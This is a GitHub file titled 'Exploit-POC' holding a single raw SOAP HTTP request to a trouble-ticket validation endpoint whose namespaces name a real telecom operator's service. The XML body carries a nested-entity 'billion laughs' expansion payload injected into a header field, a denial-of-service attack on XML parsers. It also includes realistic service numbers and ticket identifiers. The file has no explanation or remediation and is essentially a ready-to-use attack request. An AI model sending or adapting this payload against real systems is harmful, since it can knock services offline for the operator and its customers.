-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathExploit-POC
21 lines (10 loc) · 3.63 KB
/
Exploit-POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Examples Request;
POST /ATTIP/ValidateTroubleTicketOptimized HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://www.xxx.com.tr/aTTIP/Services/ValidateTroubleTicket/1.0/validateTroubleTicketInbound"
Content-Length: 3360
Host: ******
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Header><Header xmlns="http://www.turktelekom.com.tr/aTTIP/Common/1.0" xmlns:ns0="http://www.turktelekom.com.tr/aTTIP/Common/CommonType/1.0"><ns0:activityName>ValidateTroubleTicket&ha6;</ns0:activityName><ns0:msgName>ValidateTroubleTicketRequest</ns0:msgName><ns0:msgType>REQUEST</ns0:msgType><ns0:senderURI>MARS</ns0:senderURI><ns0:destinationURI>ATTIP</ns0:destinationURI><ns0:activityStatus>SUCCESS</ns0:activityStatus><ns0:userid>MARS</ns0:userid><ns0:timestamp>2018-09-03T10:46:17.866+03:00</ns0:timestamp><ns0:comunicationPattern>Notification</ns0:comunicationPattern><ns0:comunicationStyle>MSG</ns0:comunicationStyle><ns0:service>ValidateTroubleTicket</ns0:service><ns0:businessID>2018090300007241366</ns0:businessID><ns0:conversationID>43654</ns0:conversationID><ns0:requestID>8274348399326414482</ns0:requestID><ns0:messageID>43654</ns0:messageID></Header></SOAP-ENV:Header><SOAP-ENV:Body><ValidateTroubleTicketRequest xmlns="http://www.turktelekom.com.tr/aTTIP/Services/ValidateTroubleTicket/1.0" xmlns:ns0="http://www.turktelekom.com.tr/aTTIP/CDM/1.0" xmlns:ns1="http://www.turktelekom.com.tr/aTTIP/Common/1.0" xmlns:ns2="http://www.turktelekom.com.tr/aTTIP/Common/CommonType/1.0"><ns0:TTServiceRequest><ns0:interactionDate>2018-09-03T10:46:05.105+03:00</ns0:interactionDate><ns0:BusinessInteractionRelationship><ns0:WorkOrder><ns0:ID>2018090300007962763</ns0:ID></ns0:WorkOrder></ns0:BusinessInteractionRelationship><ns0:type>SSK</ns0:type><ns0:ServiceRequestCharacteristicValue><ns0:value>1896255108</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>SERVICE_NUMBER</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue><ns0:ServiceRequestCharacteristicValue><ns0:value>2018090300007241366</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>FAULT_REF_NO</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue><ns0:ServiceRequestCharacteristicValue><ns0:value>0</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>FAULT_COUNT</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue><ns0:ServiceRequestCharacteristicValue><ns0:value>ADSL</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>CFS_TYPE</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue><ns0:ServiceRequestCharacteristicValue><ns0:value>true</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>IS_ELITT</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue><ns0:ServiceRequestCharacteristicValue><ns0:value>15/04/2011 15:09:13</ns0:value><ns0:ServiceRequestSpecCharacteristic><ns0:name>SUBSCRIPTION_TIME</ns0:name></ns0:ServiceRequestSpecCharacteristic></ns0:ServiceRequestCharacteristicValue></ns0:TTServiceRequest></ValidateTroubleTicketRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>